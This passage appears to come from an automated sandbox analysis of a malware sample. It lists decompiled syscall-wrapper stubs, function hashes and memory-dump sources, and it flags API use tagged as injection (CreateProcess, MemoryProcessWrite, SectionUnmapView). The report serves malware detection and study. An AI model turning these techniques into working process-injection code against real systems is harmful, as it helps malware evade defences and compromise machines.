                                                          • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                          • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D98, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E00401D98(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                          0x00401d98
                                                          0x00401d9d
                                                          0x00401da2
                                                          0x00401da7
                                                          0x00401db5
                                                          0x00401dd5
                                                          0x00401dd7

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                          • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                          • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                          • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D18, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E00401D18(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                          0x00401d18
                                                          0x00401d1d
                                                          0x00401d22
                                                          0x00401d27
                                                          0x00401d35
                                                          0x00401d55
                                                          0x00401d57

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                          • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                          • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                          • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: conhost.exe PID: 612 Parent PID: 1380 conhost.exeCOMMON

                                                          Executed Functions

                                                          Function 0000025F5EFFE106, Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction ID: 60b14b72e3e0ea0da88e42c20eb2fb0a178bd42cc537738f7744dc0a68122fef
                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction Fuzzy Hash: A6C18430714D055BEB98DA288DC97F9B3D1FB98312F9451B9E57AC6186FE30E80287C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36125076, Relevance: .5, Instructions: 474COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5ae6d3f4db7c1bd75c73d5f2d33697750e283b595df3e666c5d50627022404a
                                                          • Instruction ID: a5b3714c091f1343832e4e8ea21b2ad8adfb6eca3b0455810308ecd6e2dfe469
                                                          • Opcode Fuzzy Hash: b5ae6d3f4db7c1bd75c73d5f2d33697750e283b595df3e666c5d50627022404a
                                                          • Instruction Fuzzy Hash: 65F1C530908A8D8FEBA8DF28D845BE937E1FF55310F04826EE84DC7295DF75A9458B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36125E22, Relevance: .5, Instructions: 460COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbba80772ac63e0376f19ae93e5874f4402dfab87f186469d60a0702d0597991
                                                          • Instruction ID: dec8e5627505930b3d340de9e283504696f21bbcb11374ed19030311acd49304
                                                          • Opcode Fuzzy Hash: dbba80772ac63e0376f19ae93e5874f4402dfab87f186469d60a0702d0597991
                                                          • Instruction Fuzzy Hash: EEE1C330918A8D8FEBA8DF28D845BE977D1FF55310F04826EE84DC7295DF75A8448B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFE4D6, Relevance: .4, Instructions: 407COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4df33c4ccec31c159c2c9679ea8671149bf8637389190af38ec92ac25d3ec371
                                                          • Instruction ID: 9fe003b4f32dcf71118cd8952619bba45e0b773193a1d1219daa846f58318066
                                                          • Opcode Fuzzy Hash: 4df33c4ccec31c159c2c9679ea8671149bf8637389190af38ec92ac25d3ec371
                                                          • Instruction Fuzzy Hash: B2E17D31508A488BDB59EF28C889BAAB7E1FF94311F14466DE85BC7151EF30E946CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFDEB2, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                          • String ID:
                                                          • API String ID: 3902440814-0
                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction ID: 15a844292c89f3f72daf541c025394b0d13d1ac9573b708e0883ef48f92eb59e
                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction Fuzzy Hash: 81816F31208E088FD768EF28C888BE677E1FF95315F404A6DE5ABC7191EE31E5458B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFD3BA, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction ID: adcd2c8a5e33f4f70a3bbbe1a87fe11e28c5c7e3182c4e8807c40726d25a0213
                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction Fuzzy Hash: CF31923130CE184BEB88AA689C893AA73D5F7D4311F001169ED5BC3286FD75ED0587C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFD2AF, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction ID: 635e27fb6363ca20dea9b3721f5f09579801abab520607214f7e23ab5c071525
                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction Fuzzy Hash: 1F319031308E184BDB98FA589C8939973D2E7D8721F4002A9AE2BC72C9FE71DD0187C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFD2A2, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction ID: ca89b844bc119fdc8f4a23780cb2e37ec93e546ae41331e6878013268bab2861
                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction Fuzzy Hash: E2E0923120CA0D1FF798A69DD88A7B666D8D795272F00007AF659C2101F456989103E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA361202F0, Relevance: .2, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77aee2bd304f3b215a2d3dee295f91c9e88cac189f5ad081aa1933fee39ed6bd
                                                          • Instruction ID: 21e7f77cc8f5aef4f0c33e77a20358be4fc9abb20bf115ed4c01b68b162d546d
                                                          • Opcode Fuzzy Hash: 77aee2bd304f3b215a2d3dee295f91c9e88cac189f5ad081aa1933fee39ed6bd
                                                          • Instruction Fuzzy Hash: 1951182770E2651EE325AB6DBC558EA7B94DF83372B044177E3C8CB153DA14284B87E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36120120, Relevance: .2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43a1ee9bcd8c3c6cf56f47076c35f9233e170c3ac9ccaf065a92a45307155bca
                                                          • Instruction ID: d8babdaf8b7cf170400a9086e4b9a97a59cad5f3d58a569a40ed10fd545ae46c
                                                          • Opcode Fuzzy Hash: 43a1ee9bcd8c3c6cf56f47076c35f9233e170c3ac9ccaf065a92a45307155bca
                                                          • Instruction Fuzzy Hash: 3351D220A1CB851FE754A77C585A6BABBD1EF9A710F1485BDE4CEC32D3CD28AC028345
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA3612101A, Relevance: .2, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34fa36bfed6418ffc34663bf92e44d382e2ef7f43a964af24848e7d25ffc4774
                                                          • Instruction ID: 8ddf65537671b1715bf0fc9c6c2455193c8b00faf18b766e6d8535115facbefa
                                                          • Opcode Fuzzy Hash: 34fa36bfed6418ffc34663bf92e44d382e2ef7f43a964af24848e7d25ffc4774
                                                          • Instruction Fuzzy Hash: 07515E2098E3C55FE347D334AC66A953FA16F83354F1D81DAE5C9CB0B3CAAA4495C712
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA361211A1, Relevance: .2, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4276de9f6782952c3cc04fe96be64331290ef9711e4204fc40c1b3e8995f93a5
                                                          • Instruction ID: 42ce69b65ce3349a5147d6bd60de1e707be41f03a7e78918c5e115b37992e1a2
                                                          • Opcode Fuzzy Hash: 4276de9f6782952c3cc04fe96be64331290ef9711e4204fc40c1b3e8995f93a5
                                                          • Instruction Fuzzy Hash: DE51C221A0C7851FE754E77C585A6B97FD1EF9A710F1485BDE48EC3293CD18AC028345
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA361203AA, Relevance: .2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5cc456e85a0bae6c8317d42c8e8b428a9841261fcd22ba437824f28efe73d31
                                                          • Instruction ID: e9f9c2c9fc27efa682ac14ddbd02fcf1a9fa982eea1b47d3712dab1d47a9f6f7
                                                          • Opcode Fuzzy Hash: e5cc456e85a0bae6c8317d42c8e8b428a9841261fcd22ba437824f28efe73d31
                                                          • Instruction Fuzzy Hash: B541D32370D2991FF325576CACA59E67F94DF93272B0442BBD2C8CB183DE15284A86E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA3612151D, Relevance: .1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8de340c3e202347c01a95aafba259f8c29e0724a85d04ea5f0d77de0a4cb58c8
                                                          • Instruction ID: cb1d8c5e68cc3c722592e1a6a09263237a4fc75d0252aa7a05890902c4d372a4
                                                          • Opcode Fuzzy Hash: 8de340c3e202347c01a95aafba259f8c29e0724a85d04ea5f0d77de0a4cb58c8
                                                          • Instruction Fuzzy Hash: 9D310761A08F5A0FF2A5D72C589657A6BD2FF5B20075880BDD64EC33D2DE2AB8419340
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36120500, Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec5bc23c772a8cf49b1cd443070bfc043397d7dd81578329562692d8c4afcdcb
                                                          • Instruction ID: 28f5cb969599b37e572287f5be751875ed3b569490d598446551329d46626a49
                                                          • Opcode Fuzzy Hash: ec5bc23c772a8cf49b1cd443070bfc043397d7dd81578329562692d8c4afcdcb
                                                          • Instruction Fuzzy Hash: 1731B320F08A894FE755ABAC98666BD6BD1DF47205F1485BAD08DDB393CD199842D301
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36126580, Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28b92669991c55ef96e846ba17d15fe3f1086e7f14faccf31a0cbe529dbde3d3
                                                          • Instruction ID: c5230f9599b5022c8d0ba2a5571ec4225ebc8e8d186f7093fa4d559490ff4964
                                                          • Opcode Fuzzy Hash: 28b92669991c55ef96e846ba17d15fe3f1086e7f14faccf31a0cbe529dbde3d3
                                                          • Instruction Fuzzy Hash: 5D113621A0CA894FEB55E76C98967E67BD0EF57310F0882B6D40CC71C7DE6A580983D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA361206C6, Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c6bb69002a5fd492e2be3710ba232ce97c7b7aeff12acf48d129803a8ccf472
                                                          • Instruction ID: d7c2709b2fbb5c52c2c6c0a754e5faa5991ef1be61a9e3e3c9f5f17ac36c289f
                                                          • Opcode Fuzzy Hash: 7c6bb69002a5fd492e2be3710ba232ce97c7b7aeff12acf48d129803a8ccf472
                                                          • Instruction Fuzzy Hash: 7A11DA30A096990FD755AFBC88661ADBBE0DF46304B1445FED44DCB2D3CD2598428340
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA361205A6, Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eae08ace360fd39946c3de698180eb3679a18bf0993937b51dda80accda2fddf
                                                          • Instruction ID: 10bf876fa31f7cf7424772ff248432e5ba232c9097c7c3f31323b345047f9cc0
                                                          • Opcode Fuzzy Hash: eae08ace360fd39946c3de698180eb3679a18bf0993937b51dda80accda2fddf
                                                          • Instruction Fuzzy Hash: 28118930A1C6590FE759EBA888A56FDB7E1EF45304F1084BED44EDB293CD25AC42C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36120621, Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e9f405028ea2c6682b1630a7698e27f8018777c8daa8245898fedf6b63b8a8f
                                                          • Instruction ID: b9a0676a0d7cab70c491be1836851fdf3ce98f46862ee08327cc84094f63d390
                                                          • Opcode Fuzzy Hash: 2e9f405028ea2c6682b1630a7698e27f8018777c8daa8245898fedf6b63b8a8f
                                                          • Instruction Fuzzy Hash: 22115B30A1865D0FD759EBA888A56FDB7E1EF45304F5084BED44EDB293CD25AC42C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36120118, Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e89e515792f44b16f5168acc05171e41712eb1f1e271a8763ba9855d3b7468a9
                                                          • Instruction ID: 584d64da45fdad7742433107773b840dc2b5b1e6cc1522f459668d6f38d5b2fd
                                                          • Opcode Fuzzy Hash: e89e515792f44b16f5168acc05171e41712eb1f1e271a8763ba9855d3b7468a9
                                                          • Instruction Fuzzy Hash: D1010831A189484FDF54EB2C9886BEA7BD0EF56314F088279E50DC72CBDE69980983D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36121160, Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 669a76aca44c26372ecaeb18b279d68ae264a41bfd2cb8ec026f73d0712b01fd
                                                          • Instruction ID: 2e49f6801d7f4d8a9a3ac15b90392b635f9b99d3448fe08b9d07022bf5e87659
                                                          • Opcode Fuzzy Hash: 669a76aca44c26372ecaeb18b279d68ae264a41bfd2cb8ec026f73d0712b01fd
                                                          • Instruction Fuzzy Hash: 50E04F61B18C1D0FDAA4F33C5885EA962D6EB9D21075586B6E80DC3296ED28DC81C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0000025F5EFFE90E, Relevance: .5, Instructions: 485COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aead6af51b41200c7faad30d12abe602ed119050d19f46eacd4953986aecc5ac
                                                          • Instruction ID: f302be33fbb86d665f79d4a6949bfc5e86cd7ab9886c706bd0d9f40a32ed0532
                                                          • Opcode Fuzzy Hash: aead6af51b41200c7faad30d12abe602ed119050d19f46eacd4953986aecc5ac
                                                          • Instruction Fuzzy Hash: 7EE1D131614E058BEBA8DF188DC97E973D1FB54321F845269E9ABC7281FE34E80287C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFED6A, Relevance: .3, Instructions: 283COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                                          • Instruction ID: c4b3f9297d02621eb5ef873a08803ea10f95c7e7d9dfa4ab4c3999567f453ca7
                                                          • Opcode Fuzzy Hash: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                                          • Instruction Fuzzy Hash: 4BA11E31508A4C8FDB55EF28C889BEA77E5FBA8315F10466EE45AC7160EF30D645CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000025F5EFFD4D2, Relevance: .3, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                                          • Instruction ID: 51d3f096b078c31c0747380645b3a6bb2bfdee75d905850e9a2c2675f5e00e96
                                                          • Opcode Fuzzy Hash: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                                          • Instruction Fuzzy Hash: 53818471618B495BEBA8DF24C8897EAB7E4FB58301F40463DE8ABC6141EF30E5458BC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: conhost.exe PID: 5252 Parent PID: 3496 conhost.exeCOMMON

                                                          Executed Functions

                                                          Function 000002C94E2FE106, Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction ID: dfbb956c087a8a903feb29c84c0dd15652ed9fdc258141b039c86a1c6e895085
                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction Fuzzy Hash: AEC176303149855BFBBDEA28C89DBBFF3D5FB98311F540129D45AC6186DF20D8839A81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA3614A30E, Relevance: 1.6, APIs: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 431b9a84f562f732426cf26c0dfe9273125ce5c31330d9ee667179d9c4dcdc25
                                                          • Instruction ID: c890e2cad29ed467c77b828a2030f1314828c3daff16ce9d8769fd42256e6a32
                                                          • Opcode Fuzzy Hash: 431b9a84f562f732426cf26c0dfe9273125ce5c31330d9ee667179d9c4dcdc25
                                                          • Instruction Fuzzy Hash: FF31D23190C7888FDB5ADB688C467A97FF0EF57320F08429BD049C72A6D665A446CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002C94E2FDEB2, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                          • String ID:
                                                          • API String ID: 3902440814-0
                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction ID: f2b07df485b11813af5f2d177fbd3979006f9ba8851f7fe695754e079a78daef
                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction Fuzzy Hash: 44816E30208A488FE778EF28C88CBABB7E5FF99315F004A6DD49BC7151EA31E5458B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA36149ED0, Relevance: 1.9, APIs: 1, Instructions: 381processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 4e97203ec5bee6642fb60901642875d235c521844fe85452b78a6521c2e7ac46
                                                          • Instruction ID: 3fd72db11bdbab9cdc6574701abb7268d5e2464609fd7b58057997774fc2b359
                                                          • Opcode Fuzzy Hash: 4e97203ec5bee6642fb60901642875d235c521844fe85452b78a6521c2e7ac46
                                                          • Instruction Fuzzy Hash: 0EC1A430918A8D4FEB68DF28CC46BE977E1FF59710F11822AE84DC7291DF75A5418B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFA3614A500, Relevance: 1.6, APIs: 1, Instructions: 127injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 7370719646f7e12ad3a2ff476cb154df7c77303e0719160a8aabd381fee462cc
                                                          • Instruction ID: 8464c59a195408b2d078bfe207f838c62ffcb0b5b566a4a68b56d8a2d1d82709
                                                          • Opcode Fuzzy Hash: 7370719646f7e12ad3a2ff476cb154df7c77303e0719160a8aabd381fee462cc
